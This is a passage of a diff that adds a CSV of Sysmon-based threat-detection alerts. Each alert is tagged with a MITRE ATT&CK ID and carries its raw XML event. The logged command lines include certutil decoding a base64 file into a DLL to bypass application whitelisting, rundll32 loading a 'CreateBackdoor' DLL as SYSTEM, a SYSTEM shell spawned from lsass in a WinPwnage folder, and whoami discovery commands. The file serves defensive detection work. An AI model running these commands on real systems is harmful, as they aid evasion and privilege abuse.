+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">c:\Windows\System32\cmd.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">365ABB72-8693-5CD7-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-8693-5CD7-0000-0010765E0000</Data>
+    <Data Name=""ParentProcessId"">492</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\lsass.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\lsass.exe</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1140] Deobfuscate/Decode Files or Information,1564435979.582599,2019-07-30T01:32:59.582599+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil  -f -decode fi.b64 AllTheThings.dll ) tried decoding file or information,1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:32:59.234755Z"">
+    </TimeCreated>
+    <EventRecordID>4890</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:32:58.940</Data>
+    <Data Name=""ProcessGuid"">747F3D96-660A-5D3F-0000-0010FFF28500</Data>
+    <Data Name=""ProcessId"">700</Data>
+    <Data Name=""Image"">C:\Windows\System32\certutil.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">CertUtil.exe</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">certutil  -f -decode fi.b64 AllTheThings.dll </Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-660A-5D3F-0000-0010B9E08500</Data>
+    <Data Name=""ParentProcessId"">3184</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">cmd  /c certutil -f -decode fi.b64 AllTheThings.dll </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564435979.582599,2019-07-30T01:32:59.582599+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil  -f -decode fi.b64 AllTheThings.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:32:59.234755Z"">
+    </TimeCreated>
+    <EventRecordID>4890</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:32:58.940</Data>
+    <Data Name=""ProcessGuid"">747F3D96-660A-5D3F-0000-0010FFF28500</Data>
+    <Data Name=""ProcessId"">700</Data>
+    <Data Name=""Image"">C:\Windows\System32\certutil.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">CertUtil.exe</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">certutil  -f -decode fi.b64 AllTheThings.dll </Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-660A-5D3F-0000-0010B9E08500</Data>
+    <Data Name=""ParentProcessId"">3184</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">cmd  /c certutil -f -decode fi.b64 AllTheThings.dll </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1584766817.982057,2020-03-21T09:00:17.982057+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:17.980991Z"">
+    </TimeCreated>
+    <EventRecordID>243512</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:17.504</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-0010686A1E00</Data>
+    <Data Name=""ProcessId"">4848</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564834100.731416,2019-08-03T16:08:20.731416+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-08-03T12:08:19.915120Z"">
+    </TimeCreated>
+    <EventRecordID>5447</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2780"" ThreadID=""3676"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-08-03 12:08:19.888</Data>
+    <Data Name=""ProcessGuid"">747F3D96-7933-5D45-0000-0010227E0701</Data>
+    <Data Name=""ProcessId"">6000</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4E9-5D45-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-7930-5D45-0000-001055DE0601</Data>
+    <Data Name=""ParentProcessId"">4740</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\consent.exe</Data>
+    <Data Name=""ParentCommandLine"">consent.exe 896 318 0000028064471300</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766817.982057,2020-03-21T09:00:17.982057+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:17.980991Z"">
+    </TimeCreated>
+    <EventRecordID>243512</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:17.504</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-0010686A1E00</Data>
+    <Data Name=""ProcessId"">4848</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1584766817.982057,2020-03-21T09:00:17.982057+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:17.980991Z"">
+    </TimeCreated>
+    <EventRecordID>243512</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:17.504</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-0010686A1E00</Data>
+    <Data Name=""ProcessId"">4848</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1082] System Information Discovery,1557801168.359432,2019-05-14T06:32:48.359432+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( &quot;C:\Windows\system32\whoami.exe&quot;  /groups) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-14T02:32:48.359432Z"">
+    </TimeCreated>
+    <EventRecordID>17717</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2024"" ThreadID=""2004"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-14 02:32:48.342</Data>
+    <Data Name=""ProcessGuid"">365ABB72-28D0-5CDA-0000-0010F76F1300</Data>
+    <Data Name=""ProcessId"">3964</Data>
+    <Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">whoami - displays logged on user information</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\whoami.exe&quot;  /groups</Data>
+    <Data Name=""CurrentDirectory"">C:\temp\PowerShell-Suite-master\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-26E1-5CDA-0000-002087350100</Data>
+    <Data Name=""LogonId"">0x13587</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-28A0-5CDA-0000-001074181300</Data>
+    <Data Name=""ParentProcessId"">2016</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[ T0000 ] Suspicious process name detected,1557801168.359432,2019-05-14T06:32:48.359432+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( &quot;C:\Windows\system32\whoami.exe&quot;  /groups ) contain suspicious command ( whoami.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-14T02:32:48.359432Z"">
+    </TimeCreated>
+    <EventRecordID>17717</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2024"" ThreadID=""2004"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-14 02:32:48.342</Data>
+    <Data Name=""ProcessGuid"">365ABB72-28D0-5CDA-0000-0010F76F1300</Data>
+    <Data Name=""ProcessId"">3964</Data>
+    <Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">whoami - displays logged on user information</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\whoami.exe&quot;  /groups</Data>
+    <Data Name=""CurrentDirectory"">C:\temp\PowerShell-Suite-master\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-26E1-5CDA-0000-002087350100</Data>
+    <Data Name=""LogonId"">0x13587</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-28A0-5CDA-0000-001074181300</Data>
+    <Data Name=""ParentProcessId"">2016</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami  /priv) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-10T13:33:29.424885Z"">
+    </TimeCreated>
+    <EventRecordID>15678</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1980"" ThreadID=""1948"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-10 13:33:29.409</Data>
+    <Data Name=""ProcessGuid"">365ABB72-7DA9-5CD5-0000-00100ED31400</Data>
+    <Data Name=""ProcessId"">2524</Data>
+    <Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">whoami - displays logged on user information</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">whoami  /priv</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-79DF-5CD5-0000-0020F8410100</Data>
+    <Data Name=""LogonId"">0x141f8</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-7D86-5CD5-0000-0010CC2E1400</Data>
+    <Data Name=""ParentProcessId"">2076</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;c:\Windows\System32\cmd.exe&quot; </Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1082] System Information Discovery,1629660818.905645,2021-08-22T23:33:38.905645+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-08-22T19:33:38.905645Z"">
+    </TimeCreated>
+    <EventRecordID>1912935</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4760"" ThreadID=""6844"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>LAPTOP-JU4M3I0E</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2021-08-22 19:33:38.890</Data>
+    <Data Name=""ProcessGuid"">00247C92-A692-6122-0000-0010A5CD1F02</Data>
+    <Data Name=""ProcessId"">11328</Data>
+    <Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
+    <Data Name=""FileVersion"">10.0.19041.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">whoami - displays logged on user information</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">whoami.exe</Data>
+    <Data Name=""CommandLine"">whoami</Data>
+    <Data Name=""CurrentDirectory"">C:\WINDOWS\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
